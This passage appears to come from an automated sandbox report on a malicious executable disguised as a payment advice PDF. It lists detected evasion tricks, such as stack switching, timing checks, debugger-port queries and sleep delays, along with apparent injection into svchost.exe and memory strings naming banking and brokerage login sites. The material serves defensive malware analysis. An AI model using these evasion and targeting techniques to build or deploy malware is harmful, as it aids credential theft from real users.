                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeAPI/Special instruction interceptor: Address: 16561A4
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387096E rdtsc 8_2_0387096E
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasautou.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 180Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 180Thread sleep time: -88000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe TID: 1912Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rasautou.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008A445A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AC6D1 FindFirstFileW,FindClose,0_2_008AC6D1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008AC75C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008AEF95
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008AF0F2
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008AF3F3
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008A37EF
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008A3B12
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008ABCBC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A5CC00 FindFirstFileW,FindNextFileW,FindClose,11_2_02A5CC00
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008449A0
                Source: firefox.exe, 0000000F.00000002.1748920713.000002AD8C7BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK^
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 3q3Zl7JL.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 3q3Zl7JL.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 3q3Zl7JL.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 3q3Zl7JL.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 3q3Zl7JL.11.drBinary or memory string: discord.comVMware20,11696492231f
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 3q3Zl7JL.11.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 3q3Zl7JL.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 3q3Zl7JL.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 3q3Zl7JL.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 3q3Zl7JL.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 3q3Zl7JL.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: lDBisuvfBkK.exe, 0000000D.00000002.3093772930.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                Source: 3q3Zl7JL.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 3q3Zl7JL.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 3q3Zl7JL.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 3q3Zl7JL.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 3q3Zl7JL.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 3q3Zl7JL.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-104491
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387096E rdtsc 8_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417E23 LdrLoadDll,8_2_00417E23
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B3F09 BlockInput,0_2_008B3F09
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00843B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00843B3A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00875A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00875A7C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00844B37 LoadLibraryA,GetProcAddress,0_2_00844B37
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_01656470 mov eax, dword ptr fs:[00000030h]0_2_01656470
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_01656410 mov eax, dword ptr fs:[00000030h]0_2_01656410
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_01654DD0 mov eax, dword ptr fs:[00000030h]0_2_01654DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h]8_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h]8_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h]8_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385438F mov eax, dword ptr fs:[00000030h]8_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385438F mov eax, dword ptr fs:[00000030h]8_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03828397 mov eax, dword ptr fs:[00000030h]8_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03828397 mov eax, dword ptr fs:[00000030h]8_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03828397 mov eax, dword ptr fs:[00000030h]8_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EC3CD mov eax, dword ptr fs:[00000030h]8_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h]8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h]8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h]8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h]8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h]8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h]8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h]8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h]8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h]8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h]8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B63C0 mov eax, dword ptr fs:[00000030h]8_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h]8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h]8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE3DB mov ecx, dword ptr fs:[00000030h]8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h]8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D43D4 mov eax, dword ptr fs:[00000030h]8_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D43D4 mov eax, dword ptr fs:[00000030h]8_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h]8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h]8_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h]8_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h]8_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038663FF mov eax, dword ptr fs:[00000030h]8_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h]8_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h]8_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h]8_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C310 mov ecx, dword ptr fs:[00000030h]8_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850310 mov ecx, dword ptr fs:[00000030h]8_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03908324 mov eax, dword ptr fs:[00000030h]8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03908324 mov ecx, dword ptr fs:[00000030h]8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03908324 mov eax, dword ptr fs:[00000030h]8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03908324 mov eax, dword ptr fs:[00000030h]8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h]8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B035C mov eax, dword ptr fs:[00000030h]8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B035C mov eax, dword ptr fs:[00000030h]8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B035C mov eax, dword ptr fs:[00000030h]8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B035C mov ecx, dword ptr fs:[00000030h]8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B035C mov eax, dword ptr fs:[00000030h]8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B035C mov eax, dword ptr fs:[00000030h]8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FA352 mov eax, dword ptr fs:[00000030h]8_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D8350 mov ecx, dword ptr fs:[00000030h]8_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390634F mov eax, dword ptr fs:[00000030h]8_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D437C mov eax, dword ptr fs:[00000030h]8_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E284 mov eax, dword ptr fs:[00000030h]8_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E284 mov eax, dword ptr fs:[00000030h]8_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h]8_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h]8_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h]8_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038402A0 mov eax, dword ptr fs:[00000030h]8_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038402A0 mov eax, dword ptr fs:[00000030h]8_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h]8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C62A0 mov ecx, dword ptr fs:[00000030h]8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h]8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h]8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h]8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h]8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h]8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h]8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h]8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h]8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h]8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039062D6 mov eax, dword ptr fs:[00000030h]8_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h]8_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h]8_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h]8_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382823B mov eax, dword ptr fs:[00000030h]8_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B8243 mov eax, dword ptr fs:[00000030h]8_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B8243 mov ecx, dword ptr fs:[00000030h]8_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390625D mov eax, dword ptr fs:[00000030h]8_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A250 mov eax, dword ptr fs:[00000030h]8_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836259 mov eax, dword ptr fs:[00000030h]8_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EA250 mov eax, dword ptr fs:[00000030h]8_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EA250 mov eax, dword ptr fs:[00000030h]8_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834260 mov eax, dword ptr fs:[00000030h]8_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834260 mov eax, dword ptr fs:[00000030h]8_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834260 mov eax, dword ptr fs:[00000030h]8_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382826B mov eax, dword ptr fs:[00000030h]8_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h]8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03870185 mov eax, dword ptr fs:[00000030h]8_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EC188 mov eax, dword ptr fs:[00000030h]8_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EC188 mov eax, dword ptr fs:[00000030h]8_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D4180 mov eax, dword ptr fs:[00000030h]8_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D4180 mov eax, dword ptr fs:[00000030h]8_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B019F mov eax, dword ptr fs:[00000030h]8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B019F mov eax, dword ptr fs:[00000030h]8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B019F mov eax, dword ptr fs:[00000030h]8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B019F mov eax, dword ptr fs:[00000030h]8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h]8_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h]8_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h]8_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F61C3 mov eax, dword ptr fs:[00000030h]8_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F61C3 mov eax, dword ptr fs:[00000030h]8_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h]8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h]8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h]8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h]8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039061E5 mov eax, dword ptr fs:[00000030h]8_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038601F8 mov eax, dword ptr fs:[00000030h]8_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
